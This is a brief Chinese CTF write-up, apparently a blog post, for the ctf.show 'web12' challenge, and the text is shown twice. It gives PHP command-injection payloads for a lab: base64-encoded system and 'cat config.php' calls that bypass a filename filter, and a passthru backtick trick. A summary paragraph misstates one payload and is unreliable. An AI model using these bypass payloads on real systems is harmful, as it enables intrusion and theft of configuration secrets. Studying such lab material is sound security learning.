ctf show 萌新web12
文件名也被过滤掉
base64绕过


构造paylaod
?c=$a=base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b);
得到flag
或者是
对于反引号 在Linux中,`` 作用是优先执行里面的内容,再把里面的内容传给外面的语句。所以构造:
c=passthru("ca''t `ls`");
本文介绍了在CTF比赛中遇到的一个Web12挑战,涉及了文件名过滤与Base64编码的绕过策略。通过构造特定的payload,如使用`c=eval(base64_decode('system'));c('cat config.php'))`或利用反引号的优先执行特性来执行命令,成功获取到flag。该案例展示了在安全场景下对编码与命令注入的理解和应用。
ctf show 萌新web12
文件名也被过滤掉
base64绕过


构造paylaod
?c=$a=base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b);
得到flag
或者是
对于反引号 在Linux中,`` 作用是优先执行里面的内容,再把里面的内容传给外面的语句。所以构造:
c=passthru("ca''t `ls`");
981
563

被折叠的 条评论
为什么被折叠?